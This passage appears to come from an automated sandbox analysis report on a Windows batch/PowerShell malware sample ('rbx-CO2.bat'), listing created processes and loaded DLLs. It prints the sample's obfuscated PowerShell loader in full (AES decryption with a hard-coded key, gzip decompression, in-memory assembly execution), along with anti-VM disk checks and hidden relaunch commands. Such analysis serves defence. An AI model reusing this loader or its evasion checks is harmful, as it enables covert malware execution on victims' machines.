+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $yMLVqpDcpHk.CreateType();}$tBOzPEeXdclpo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+'st'+'e'+''+'m'+''+'.'+''+[Char](100)+'l'+'l'+'')}).GetType(''+[Char](77)+'icr'+'o'+''+'s'+''+'o'+''+[Char](102)+''+[Char](116)+''+[Char](46)+''+'W'+''+[Char](105)+'n'+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'af'+[Char](101)+''+[Char](78)+'a'+[Char](116)+''+'i'+''+'v'+''+'e'+'Met'+[Char](104)+''+'o'+''+[C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\dllhost.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Users\user\Desktop\rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden "Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Windows\$rbx-onimai2\$rbx-CO2.bat" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get ModelJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"DADY HARDDISK" /c:"WDS100T2B0A" /c:"QEMU HARDDISK" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get Manufacturer,Model Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\findstr.exe findstr /i /c:"BOCHS_" /c:"BXPC___" /c:"QEMU" /c:"VirtualBox" Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c echo function Rgueq($eXEDy){ $HKJEc=[System.Security.Cryptography.Aes]::Create(); $HKJEc.Mode=[System.Security.Cryptography.CipherMode]::CBC; $HKJEc.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $HKJEc.Key=[System.Convert]::FromBase64String('/Ali2v8PJeAtW7Ez9DIBWBzxD0zIlyoV/CL0FcnA0lQ='); $HKJEc.IV=[System.Convert]::FromBase64String('VZVM+EzOQl4yXpCtgZwmdA=='); $HipTi=$HKJEc.CreateDecryptor(); $ioqgE=$HipTi.TransformFinalBlock($eXEDy, 0, $eXEDy.Length); $HipTi.Dispose(); $HKJEc.Dispose(); $ioqgE;}function qVeuI($eXEDy){ Invoke-Expression '$Vcvep=New-Object blckSblckyblcksblcktblckeblckmblck.blckIblckOblck.blckMblckeblckmblckoblckrblckyStblckrblckeblckamblck(,$eXEDy);'.Replace('blck', ''); Invoke-Expression '$MxJbU=New-Object blckSblckyblcksblcktblckeblckm.blckIblckOblck.MblckeblckmblckoblckrblckyblckSblcktblckrblckeblckablckmblck;'.Replace('blck', ''); Invoke-Expression '$mnyLH=New-Object Sblckyblcksblcktblckeblckmblck.blckIblckOblck.blckCblckoblckmblckpblckrblckeblckssblckioblcknblck.GblckZiblckpblckSblcktblckrblckeblckablckmblck($Vcvep, [blckIblckOblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblck.blckCblckoblckmblckpblckrblckeblcksblcksblckiblckoblcknblckMblckoblckdblckeblck]::Dblckecblckomblckprblckesblcks);'.Replace('blck', ''); $mnyLH.CopyTo($MxJbU); $mnyLH.Dispose(); $Vcvep.Dispose(); $MxJbU.Dispose(); $MxJbU.ToArray();}function cOeZm($eXEDy,$gMyOP){ Invoke-Expression '$ucFsW=blck[blckSblckyblcksblcktblckeblckmblck.blckRblckeblckfblcklblckeblckcblcktblckiblckoblcknblck.blckAblcksblcksblckeblckmblckbblcklblckyblck]blck::blckLblckoblckablckdblck([byte[]]$eXEDy);'.Replace('blck', ''); Invoke-Expression '$tEhqK=$ucFsW.blckEblcknblcktblckrblckyblckPblckoblckiblcknblcktblck;'.Replace('blck', ''); Invoke-Expression '$tEhqK.blckIblcknblckvblckoblckkblckeblck(blck$blcknblckublcklblcklblck, $gMyOP)blck;'.Replace('blck', '');}$tVqDd = 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat';$host.UI.RawUI.WindowTitle = $tVqDd;$kJvvr=[System.IO.File]::ReadAllText($tVqDd).Split([Environment]::NewLine);foreach ($ghynT in $kJvvr) { if ($ghynT.StartsWith(':: ')) { $EnVTr=$ghynT.Substring(3); break; }}$ULNbJ=[string[]]$EnVTr.Split('\');Invoke-Expression '$hDTZf=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[0])));'.Replace('blck', '');Invoke-Expression '$TIMGz=qVeuI (Rgueq (blck[blckCblckoblcknblckvblckeblckrblcktblck]blck:blck:blckFblckrblckoblckmblckBblckablcksblckeblck6blck4blckSblcktblckrblckiblcknblckgblck($ULNbJ[1])));'.Replace('blck', '');cOeZm $hDTZf (,[string[]] (''));cOeZm $TIMGz (,[string[]] ('')); Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle HiddenJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Delete /TN "$rbx-CNT1" /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\dllhost.exe C:\Windows\System32\dllhost.exe /Processid:{8d1ed557-2027-497c-a325-29d4d11b1321}
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: faultrep.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dbgcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pdh.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
